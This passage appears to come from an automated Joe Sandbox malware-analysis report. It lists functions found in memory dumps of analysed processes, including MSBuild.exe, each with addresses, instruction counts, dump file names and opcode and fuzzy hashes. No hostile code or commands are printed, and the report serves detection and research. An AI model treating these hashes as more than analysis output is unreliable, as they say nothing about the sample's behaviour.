Opcode Fuzzy Hash: 1a80ae7c77bfc909e315bd1fa4ac550bd2c7954549624084699912cbe0ef1613
Instruction Fuzzy Hash: 8EF0B430A1D6028FD308EF18C49147973E2FBE4751F605538E486C3690DF34FC028689

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1472B Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cabf3c7c6dfa54dfd022a5f522abc2e7077a8ccf21bc29a9dc1b880b43460ee
Instruction ID: 7d221f475fb3e93e0e35ca6564536dc5ccc516d1b9187dfa4533584b3d088f0e
Opcode Fuzzy Hash: 3cabf3c7c6dfa54dfd022a5f522abc2e7077a8ccf21bc29a9dc1b880b43460ee
Instruction Fuzzy Hash: 74E01B3160CE184FE654FF2CF881669B3D1FBD4360F10056EE55DC3155D625E5868B46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F142AC Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3acd957b2c7527faa505eaf3365b4a98d64eb43e9f1e2db66617ef4c78c48e8e
Instruction ID: 8c5ffc9569b23d9a961df611421e31ed85e2785306c9815e40a88a2535fa219f
Opcode Fuzzy Hash: 3acd957b2c7527faa505eaf3365b4a98d64eb43e9f1e2db66617ef4c78c48e8e
Instruction Fuzzy Hash: AEE01A31B0C4464FE398AA089840665B3D7EBF83A0F384279D51AC32D4DE289D424718

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491F0F09 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2874830630.00007FF8491E8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491E8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8491e8000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e073bc7c6d92c15e785698f853a4c81e75855ade0bb26017b696bd33da7dae6
Instruction ID: 96ac782414a5bc5fee6792a071cbfe9a29712c4901f40192184d9873b46a4b6a
Opcode Fuzzy Hash: 9e073bc7c6d92c15e785698f853a4c81e75855ade0bb26017b696bd33da7dae6
Instruction Fuzzy Hash: 4EE0ED3180E3CD8FE3226B2498551E87F20FF42350F4902FBD2888A0D3EA1D9858C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11AD7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7daf927f9bcbaf4f144582ae81fd01fe81b2d853714e202eeadc26e498caafc0
Instruction ID: 80186416d0871fa07eae3b2c37df233a8bb3fc4ea5772d88aa6f7c451286b101
Opcode Fuzzy Hash: 7daf927f9bcbaf4f144582ae81fd01fe81b2d853714e202eeadc26e498caafc0
Instruction Fuzzy Hash: F6E09A346488198FDB50EB4CD494A9973E2FB98361F154265D40ACB3A9DE64ED818B84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F14AFF Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be20fe656974fca70ce818e86034514a5e1b6aa9fe79b7c89880c7587b28c118
Instruction ID: 95f982b973405121cafbc49fba7015309b960a5bd04b0a4b53d4194032de9c76
Opcode Fuzzy Hash: be20fe656974fca70ce818e86034514a5e1b6aa9fe79b7c89880c7587b28c118
Instruction Fuzzy Hash: 55E04F3070C5018BE758BA14C4556797353E7E2361F108A39C01AC72D5DE68A8628788

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10875 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a68ca9d510561b81f0cfc7c6c49f539a6a8367dbcc87304758e6d7591feb9fc
Instruction ID: 4e5a97c3319b5a9519b1f105975be23190a619293d23435f53395e44e30ed6db
Opcode Fuzzy Hash: 3a68ca9d510561b81f0cfc7c6c49f539a6a8367dbcc87304758e6d7591feb9fc
Instruction Fuzzy Hash: 91D0123284E6885ED713372458510E87F50AFC1254F0501A3E99845093AA5559288246

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12C83 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541e1541389699ffe85d77454d0b9912d4ee03aa893ceeaf1d294225bb267286
Instruction ID: a57e1b474f453b7a875d08c182e9c1e40f5f18396e7cd222c27d546f5e99aad0
Opcode Fuzzy Hash: 541e1541389699ffe85d77454d0b9912d4ee03aa893ceeaf1d294225bb267286
Instruction Fuzzy Hash: 3EE086352086058FE325FB60D8406A533E5EBA1351F140A3EC806C77E1DF39E940CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10F1C Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afbc6567fa7004f7c493a6fd6bd5e97fc8ed718392bd14ffb6d50e589d84de4
Instruction ID: 398cf84544275d2d453f52044cd013dc13b244c6b5f46d200e64cf41265e9144
Opcode Fuzzy Hash: 2afbc6567fa7004f7c493a6fd6bd5e97fc8ed718392bd14ffb6d50e589d84de4
Instruction Fuzzy Hash: FBC0123285F6E60EDA0622382C2A4D06F90D967420B8955FEC484CB2D3D58E184A8751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F116DD Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4a24afcb59fba8a58b9b4b88902ab3a0ebadc93f080466e38474c85b149841
Instruction ID: 2663db4d0d9deabed879f2f0c5bccce47773d0e11aaa372b4992df549a1203ea
Opcode Fuzzy Hash: 4f4a24afcb59fba8a58b9b4b88902ab3a0ebadc93f080466e38474c85b149841
Instruction Fuzzy Hash: 4CC048B378EA190D754C284CBC030F8B3C0C683171680267FEA8B819A7A84B64A70089

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11C4F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621f6c674eded2813456e63b7a073960318f5d8543c7c38320d04383389830e2
Instruction ID: 94cd3c5ee31d4a651751a82d58912443ae15a24f4a91595c9e71038aa944c534
Opcode Fuzzy Hash: 621f6c674eded2813456e63b7a073960318f5d8543c7c38320d04383389830e2
Instruction Fuzzy Hash: 7EE0B63160C41A8FFB54FB50C864DE973A2EBA0351F20057AD509C72E6EE28A9818648

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F18BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FF848F18BFA
N_^, xrefs: 00007FF848F18C12
N_^, xrefs: 00007FF848F18C72
N_^, xrefs: 00007FF848F18C2A

Memory Dump Source

Source File: 0000000B.00000002.2869104545.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff848f10000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-4208670735
Opcode ID: 0abf0ec98f0db55352ddb0d87eb427b9e43107513a07060bf9b9049f309ed4c5
Instruction ID: 4c109c1ace6e0e5d715d34bc27d909b0d54be699cc9a044319ca57b44e036f9f
Opcode Fuzzy Hash: 0abf0ec98f0db55352ddb0d87eb427b9e43107513a07060bf9b9049f309ed4c5
Instruction Fuzzy Hash: BC21C1B290F2805FD346A76D5CA54903BE0FF2225CB4D01E6D19CCF2A3FA1968068357

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exePID: 5640, Parent PID: 6136COMMON

Executed Functions

Function 00007FF848F4176A Relevance: 3.9, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

xJH, xrefs: 00007FF848F41799
xJH, xrefs: 00007FF848F417D4
xJH, xrefs: 00007FF848F417FB

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID: xJH$xJH$xJH
API String ID: 0-4153751759
Opcode ID: 00e4b5967df3971794d9a9c7d102b7985c2c8827a895272019cbd8159304e2dc
Instruction ID: 74c7bdaa47d8312d7c025f61871d57256d0f2de7e5706d51c592b08dee54838c
Opcode Fuzzy Hash: 00e4b5967df3971794d9a9c7d102b7985c2c8827a895272019cbd8159304e2dc
Instruction Fuzzy Hash: 454147F2D0DA999FE745EB64D8057F8BBA0FF65394F1401BEC0099B0D2EB2A1885C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44EBA Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dccbf2e414161dbf426224e5e2c81a02ea8c14524db19066fd76f2c68db60c4
Instruction ID: 9524f92123d246a9ffc2fc892d7792b5956da6206e35a5a8e872248f79238be8
Opcode Fuzzy Hash: 6dccbf2e414161dbf426224e5e2c81a02ea8c14524db19066fd76f2c68db60c4
Instruction Fuzzy Hash: 02912D70D09A5D8FDB94EB68C455BA8BBF1FF69305F1041AAD00EE7292DB34A885CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4428A Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 360744ea92ac3e2b9b8b71c61fe9fd1b01e1dade07371afa3785e03000e76e31
Instruction ID: ea157b9932c1d9dad1c7902d980a1387e3d7e4432e99be214ba7290821678007
Opcode Fuzzy Hash: 360744ea92ac3e2b9b8b71c61fe9fd1b01e1dade07371afa3785e03000e76e31
Instruction Fuzzy Hash: D0912CB0D0DA5C8FDB94EB68C455BA8BBF1FF69305F1041AAD00DE7292DB359985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4469A Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c55bc67797c680eda3802d1551ec6ca708000e3633bac7346efcc972ff1937a
Instruction ID: 5cc5f2e220c001c160eab252db579033c280392a1b84453dfbe209100b726db8
Opcode Fuzzy Hash: 5c55bc67797c680eda3802d1551ec6ca708000e3633bac7346efcc972ff1937a
Instruction Fuzzy Hash: 47912CB0D09A5C9FDB94EB68C495BACBBF1FF69305F1041AAD00EE7291DB359881CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F452CA Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791926a18ab038e8d1629a263c09d3ff258d2ada22512622e913c231ade3eb8f
Instruction ID: e07a8bff9bc9f241414d1cb0fbb085716f43dbd24cd7e859e2e38c81e0ad6b2b
Opcode Fuzzy Hash: 791926a18ab038e8d1629a263c09d3ff258d2ada22512622e913c231ade3eb8f
Instruction Fuzzy Hash: 8B912CB0D09A5C9FDB94EB68C455BACBBF1FF69305F1041AAD00EE7291CB35A885CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44AAA Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3a14a6e4023ea7b83eb4c1cb5b00267d0e57bc64f5290cad5db5f7f15e8579c
Instruction ID: 5f145ee349a9051241d0a076a74c2fb6131bc49791f7715f6c8eb2de2825bcec
Opcode Fuzzy Hash: b3a14a6e4023ea7b83eb4c1cb5b00267d0e57bc64f5290cad5db5f7f15e8579c
Instruction Fuzzy Hash: B5914CB0D09A5C8FDB94EB68C455BACBBF1FF69305F1441AAC00EE7292DB359885CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F43E7A Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f618ab70a740778017ed6c60db60acef9dd9133006a628b5ff3f201b22bba6a
Instruction ID: 17e1992d84f7c4451175cd81e23d2bde95d2aeeab1f97d30cf9fc7c15b7d0434
Opcode Fuzzy Hash: 6f618ab70a740778017ed6c60db60acef9dd9133006a628b5ff3f201b22bba6a
Instruction Fuzzy Hash: 2B912CB0D09A5C9FDB94EB68C455BA8BBF1FF69305F1040AED00EE7292DB359885CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4572D Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e139e1b7972cf534cffb9614975a0ad3794e1662ca9160cc59f90a299db8a5b
Instruction ID: 4c21f5255ab8f506f765d17877827e2cc85d5f53db017445a32530b864c633e4
Opcode Fuzzy Hash: 3e139e1b7972cf534cffb9614975a0ad3794e1662ca9160cc59f90a299db8a5b
Instruction Fuzzy Hash: CD812C70D09A5C9FDB94EB68C495BA8BBF1FF69301F5441EAD00DE7292CB34A985CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F436C7 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1fae3e777f735d637deaa9dc7174a25c78e6892f7ec22f464270b718458d2df
Instruction ID: be0b048b4813782cb6b579bf1758192e5af6776d501152174ed0323eae5caccb
Opcode Fuzzy Hash: e1fae3e777f735d637deaa9dc7174a25c78e6892f7ec22f464270b718458d2df
Instruction Fuzzy Hash: 05815DB0D0CA5D8FDB94EB68C455BA8BBF1FF69304F1040AAD04DE7292CB34A981CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F45B0A Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d63ebb7fc428fb222aab187732a48daf2362891d6c24caa83683cefd99275e3
Instruction ID: ea08216029d8fa59cbfc5a05bef4cf10674c737ac1701a1ba0e0243f9b3a7b89
Opcode Fuzzy Hash: 5d63ebb7fc428fb222aab187732a48daf2362891d6c24caa83683cefd99275e3
Instruction Fuzzy Hash: 28515174A09A1C9FDF94EF68C895BACBBF1FF69301F5441A9D00DE7252DA74A881CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F43ED7 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fdfc20e4307290af40696dc1300149eb410e298c0b38735b67ed150bcef9544
Instruction ID: 7927ef2a85955180f1c65e3d0b7d5c0940193392c0d4b647fdb8e7c29b051634
Opcode Fuzzy Hash: 1fdfc20e4307290af40696dc1300149eb410e298c0b38735b67ed150bcef9544
Instruction Fuzzy Hash: D7513BB0D0DA5C9FDB98EB68C455BA9BBF1FF69305F5000AAD04EE7292CB355984CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F442E7 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef5454a9ba7b6f8fc2d01d7c35b1000bb5a2fa3bd790a257b58ae20c7f35e6d
Instruction ID: 228151a23cbca23ee537e423f26a3ba52b44f4b6b2e9c28c7528bec385bbc431
Opcode Fuzzy Hash: 4ef5454a9ba7b6f8fc2d01d7c35b1000bb5a2fa3bd790a257b58ae20c7f35e6d
Instruction Fuzzy Hash: 1D513BB0D0DA5C9FDB94EB68C455BA9BBF1FF69705F5000AAD04DE7292CB34A980CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F446F7 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee780f00c2cf7a191f9c73817eb9bb2bf2b47449a6f22b625d5af3e27a42dad4
Instruction ID: eae02e9644498470949951c02260af3af3bcaefae1ec3faace94f038e0768318
Opcode Fuzzy Hash: ee780f00c2cf7a191f9c73817eb9bb2bf2b47449a6f22b625d5af3e27a42dad4
Instruction Fuzzy Hash: 0C513BB0D0DA5C9FDB94EB68C455BA9BBF1FF69305F5001AAD04DE7292CB385980CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44B07 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab44dc274bce320ee0b3f4ccf3f9ef7f727afd3b68f6d15620d8bc7aca232d9
Instruction ID: 38b5dc54ce37ed036cde4ebcce192800f055084fd6e1c2739ac42b8d8adfbfe8
Opcode Fuzzy Hash: 3ab44dc274bce320ee0b3f4ccf3f9ef7f727afd3b68f6d15620d8bc7aca232d9
Instruction Fuzzy Hash: F05129B0D09A5C9FDB98EB688455BA9BBF1FF69305F4400AAD04DE7292CB356984CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44F17 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62f6bfc7cf79f2f7109178d617b36b1f203ae7e0795525dd46eaf97ad5f3257
Instruction ID: 3319fa2496a2fdbc0f5a22a19744577db226b3e0e1a0d8259c07dc029bb310ef
Opcode Fuzzy Hash: a62f6bfc7cf79f2f7109178d617b36b1f203ae7e0795525dd46eaf97ad5f3257
Instruction Fuzzy Hash: 4F513BB0D0DA1D9FDB94EB68C455BA9BBF1FF69301F4001AAD04EE7292CB356980CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F45327 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488b7bc3ad0956a5d26a29710b3d39d691d996433d172859edd729a00d432a02
Instruction ID: 5b039b59ba5521baad1bc3d0862def6e272ef0ba27eed90fc20b0e664f8bcc1d
Opcode Fuzzy Hash: 488b7bc3ad0956a5d26a29710b3d39d691d996433d172859edd729a00d432a02
Instruction Fuzzy Hash: DC512AB0D1DA5C9FDB94EB68C455BA9BBF1FF69305F4401AAD04DE7292CB386980CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F45AF9 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc36c1f81987f23e1ff3fd38aba177fe0936746565c745e06cea2113d1e35e94
Instruction ID: 5b5ec6e318e9e3f32982a4f82288c8cc81b6be7c5858ab6cd194692140ac7931
Opcode Fuzzy Hash: bc36c1f81987f23e1ff3fd38aba177fe0936746565c745e06cea2113d1e35e94
Instruction Fuzzy Hash: 26514E74A0892C9FDF94EF68C895BADB7F1FB69301F5041A9E00DE7251DB34A885CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42312 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6813b71cda87467002ab54170ce3f00ba572ef98dc1cf083cfcb038010addb1a
Instruction ID: 98f485f4f5b85b2a39bac1dbf7855ca6104ee746eef9d5a798c315c54e90245c
Opcode Fuzzy Hash: 6813b71cda87467002ab54170ce3f00ba572ef98dc1cf083cfcb038010addb1a
Instruction Fuzzy Hash: 05417371D0DA8D9FDB91EBA8D4597ACBBF1FF6A340F04006AC449E7292DB745845CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40B0D Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f84cb34f4f901e18720fc1eed2aec085908c4148983dee58f26100c217d5e8
Instruction ID: 32229daa3a19a62641c24a722c4614dd1c91840d67d9cdf4e924e133d4dba8e7
Opcode Fuzzy Hash: 85f84cb34f4f901e18720fc1eed2aec085908c4148983dee58f26100c217d5e8
Instruction Fuzzy Hash: 7A4128B690EBC55FE3426774A8193E57FA0EF62369F0901FAC4809B0E7EB681807C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F462AA Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd0a49f605095d4e83ca1f9cb4b247e788c1614b0d9d0a4a8ebdd770790a7f86
Instruction ID: 29520acc2f3a4318f5845198e9236e9c64d9b9ccb1e41076504e6e380eaf6f18
Opcode Fuzzy Hash: dd0a49f605095d4e83ca1f9cb4b247e788c1614b0d9d0a4a8ebdd770790a7f86
Instruction Fuzzy Hash: D2410270C0EA899FEB41ABB4C4157E9BFB1EF5A744F0400BAD009D72D3CA6D5842CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40B30 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1140612181c8a46c7cffdbb8219a68d36378fb99229cba3fc00dadb7490c2c
Instruction ID: 3f630920a0cad4d17a0e788fb68f3f5125f14c3fceb962f3caebc96fe6a9faec
Opcode Fuzzy Hash: 9a1140612181c8a46c7cffdbb8219a68d36378fb99229cba3fc00dadb7490c2c
Instruction Fuzzy Hash: AC311AB690EFC55FE3426774A8193A57FA0EF62369F1901EAC4819B0E7D7680807C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40B38 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3071203983.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7491d4c42ab2cbc77e7800de718645a427519d3080dcbe711d9d9ae3427ea0
Instruction ID: bf5669d1180949933f98ddd585a45e21be3987f4e0b138e16ddcf8eeb77fef49
Opcode Fuzzy Hash: 2b7491d4c42ab2cbc77e7800de718645a427519d3080dcbe711d9d9ae3427ea0
Instruction Fuzzy Hash: 81312DB690EFC55FE3826774A8293A57FA0EF62369F1900FAC481DB0E7D76808078745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40B40 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

